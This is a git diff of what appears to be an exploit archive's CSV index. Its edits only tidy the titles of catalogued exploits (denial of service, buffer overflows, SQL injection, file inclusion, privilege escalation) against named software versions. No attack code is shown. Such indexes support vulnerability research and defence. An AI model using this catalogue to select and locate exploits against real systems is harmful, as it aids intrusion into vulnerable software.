diff --git a/files.csv b/files.csv index bb5b4ab5b..8c4747e46 100755 --- a/files.csv +++ b/files.csv @@ -207,7 +207,7 @@ id,file,description,date,author,platform,type,port 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0 215,platforms/linux/local/215.c,"glibc - locale bug mount Exploit",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 -217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0 +217,platforms/linux/local/217.c,"UUCP Exploit - File Creation/Overwriting (symlinks) Exploit",2000-12-04,t--zen,linux,local,0 218,platforms/linux/local/218.c,"expect (/usr/bin/expect) - Buffer Overflow",2000-12-04,isox,linux,local,0 219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80 @@ -354,7 +354,7 @@ id,file,description,date,author,platform,type,port 378,platforms/windows/remote/378.pl,"BlackJumboDog - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 -381,platforms/windows/local/381.c,"Serv-U 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 +381,platforms/windows/local/381.c,"Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 384,platforms/php/webapps/384.txt,"PHP - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 @@ -394,7 +394,7 @@ id,file,description,date,author,platform,type,port 423,platforms/windows/dos/423.pl,"Easy File Sharing WebServer 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos,0 424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0 -426,platforms/windows/remote/426.c,"TiTan FTP Server - Long Command Heap Overflow (PoC)",2004-08-31,lion,windows,remote,21 +426,platforms/windows/remote/426.c,"Titan FTP Server - Long Command Heap Overflow (PoC)",2004-08-31,lion,windows,remote,21 427,platforms/windows/dos/427.c,"WFTPD Pro Server 3.21 - MLST Remote Denial of Service",2004-08-31,lion,windows,dos,0 428,platforms/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos,0 429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0 @@ -408,7 +408,7 @@ id,file,description,date,author,platform,type,port 437,platforms/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 438,platforms/linux/local/438.c,"CDRecord - '$RSH' exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow",2004-09-12,Delikon,windows,remote,21 -463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0 +463,platforms/windows/dos/463.c,"Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0 465,platforms/php/webapps/465.pl,"PHP-Nuke - SQL Injection Edit/Save Message(s)",2004-09-16,iko94,php,webapps,0 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0 @@ -471,7 +471,7 @@ id,file,description,date,author,platform,type,port 607,platforms/windows/dos/607.c,"Flash Messaging 5.2.0g - Remote Denial of Service",2004-03-02,"Luigi Auriemma",windows,dos,0 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0 -611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal / Denial of Service (PoC)",2004-11-01,"Luigi Auriemma",windows,dos,0 +611,platforms/windows/dos/611.c,"Chesapeake TFTP Server 1.0 - Directory Traversal / Denial of Service (PoC)",2004-11-01,"Luigi Auriemma",windows,dos,0 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 @@ -644,7 +644,7 @@ id,file,description,date,author,platform,type,port 818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote Buffer Overflow (French Windows OS support)",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 -822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21 +822,platforms/windows/remote/822.c,"Serv-U FTP Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21 @@ -959,7 +959,7 @@ id,file,description,date,author,platform,type,port 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0 -1158,platforms/windows/dos/1158.pl,"WS_FTP Server 5.03 - (RNFR) Buffer Overflow",2004-11-29,"Reed Arvin",windows,dos,0 +1158,platforms/windows/dos/1158.pl,"Ipswitch WS_FTP Server 5.03 - (RNFR) Buffer Overflow",2004-11-29,"Reed Arvin",windows,dos,0 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a - (check) Buffer Overflow",2004-12-01,"Reed Arvin",windows,dos,0 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - (USER) Remote Buffer Overflow",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0 @@ -1043,7 +1043,7 @@ id,file,description,date,author,platform,type,port 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution",2005-10-11,RusH,linux,remote,0 1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0 1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution",2005-10-14,rgod,php,webapps,0 -1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 +1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,asp,webapps,0 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) - Denial of Service",2005-10-16,posidron,multiple,dos,0 1254,platforms/multiple/dos/1254.html,"Opera 8.02 - Remote Denial of Service (1)",2005-10-16,posidron,multiple,dos,0 @@ -1295,7 +1295,7 @@ id,file,description,date,author,platform,type,port 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection",2006-03-04,nukedx,asp,webapps,0 1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 -1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 +1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local,0 1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow",2006-03-05,Kozan,windows,local,0 @@ -1465,7 +1465,7 @@ id,file,description,date,author,platform,type,port 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - (GET) Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 -1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 +1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0 @@ -1660,7 +1660,7 @@ id,file,description,date,author,platform,type,port 1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection",2006-06-23,rgod,php,webapps,0 1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - 'ROOT_PATH' Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0 -1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0 +1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 @@ -2629,7 +2629,7 @@ id,file,description,date,author,platform,type,port 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0 2950,platforms/windows/local/2950.c,"DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local+Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 -2952,platforms/windows/dos/2952.py,"WinFtp Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0 +2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 2954,platforms/linux/dos/2954.html,"KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - (buycd.php) Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 @@ -2649,13 +2649,13 @@ id,file,description,date,author,platform,type,port 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 -2972,platforms/windows/dos/2972.c,"DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0 +2972,platforms/windows/dos/2972.c,"Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0 2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 -2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service",2006-12-22,shinnai,windows,dos,0 +2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Service",2006-12-22,shinnai,windows,dos,0 2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - (Authenticate.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2981,platforms/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 @@ -2857,7 +2857,7 @@ id,file,description,date,author,platform,type,port 3179,platforms/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 3181,platforms/osx/local/3181.rb,"Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Privilege Escalation",2007-01-23,MoAB,osx,local,0 -3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service",2007-01-23,shinnai,windows,dos,0 +3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 @@ -3013,7 +3013,7 @@ id,file,description,date,author,platform,type,port 3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure",2007-02-20,DarkFig,php,webapps,0 3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - 'id' SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 3340,platforms/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 -3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 +3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 3344,platforms/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - (INSERT) Blind SQL Injection (MySQL)",2007-02-20,krasza,php,webapps,0 @@ -3056,7 +3056,7 @@ id,file,description,date,author,platform,type,port 3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 -3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - (ABOR) Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0 +3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local,0 3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - (inlinemod.php postids) SQL Injection",2007-02-28,rgod,php,webapps,0 3388,platforms/windows/remote/3388.pl,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 @@ -3703,7 +3703,7 @@ id,file,description,date,author,platform,type,port 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2",2007-06-07,Excepti0n,windows,remote,0 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote,0 -4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0 +4046,platforms/windows/dos/4046.pl,"MiniWeb HTTP Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0 4047,platforms/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote Denial of Service",2007-06-08,mu-b,windows,dos,0 4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 @@ -4955,7 +4955,7 @@ id,file,description,date,author,platform,type,port 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0 -5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0 +5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0 5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - (album) SQL Injection",2008-03-28,parad0x,php,webapps,0 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0 @@ -5075,7 +5075,7 @@ id,file,description,date,author,platform,type,port 5435,platforms/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - (pollID) SQL Injection",2008-04-13,S@BUN,php,webapps,0 5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 -5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service",2008-04-13,j0rgan,windows,dos,0 +5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,windows,dos,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0 @@ -5898,7 +5898,7 @@ id,file,description,date,author,platform,type,port 6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote,0 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 -6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0 +6305,platforms/hardware/remote/6305.htm,"Belkin Wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0 6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,php,webapps,0 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) SQL Injection",2008-08-26,cOndemned,php,webapps,0 @@ -6235,8 +6235,8 @@ id,file,description,date,author,platform,type,port 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 -6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 -6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 +6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 +6661,platforms/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 @@ -6290,7 +6290,7 @@ id,file,description,date,author,platform,type,port 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 -6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 +6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0 @@ -6325,7 +6325,7 @@ id,file,description,date,author,platform,type,port 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 6752,platforms/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)",2008-10-14,LiquidWorm,windows,dos,0 -6753,platforms/windows/dos/6753.py,"Titan FTP server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,windows,dos,0 +6753,platforms/windows/dos/6753.py,"Titan FTP Server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,windows,dos,0 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0 6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0 6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0 @@ -7254,7 +7254,7 @@ id,file,description,date,author,platform,type,port 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0 7711,platforms/php/webapps/7711.txt,"Fast FAQs System - (Authentication Bypass) SQL Injection",2009-01-09,x0r,php,webapps,0 -7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP write Password with read access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 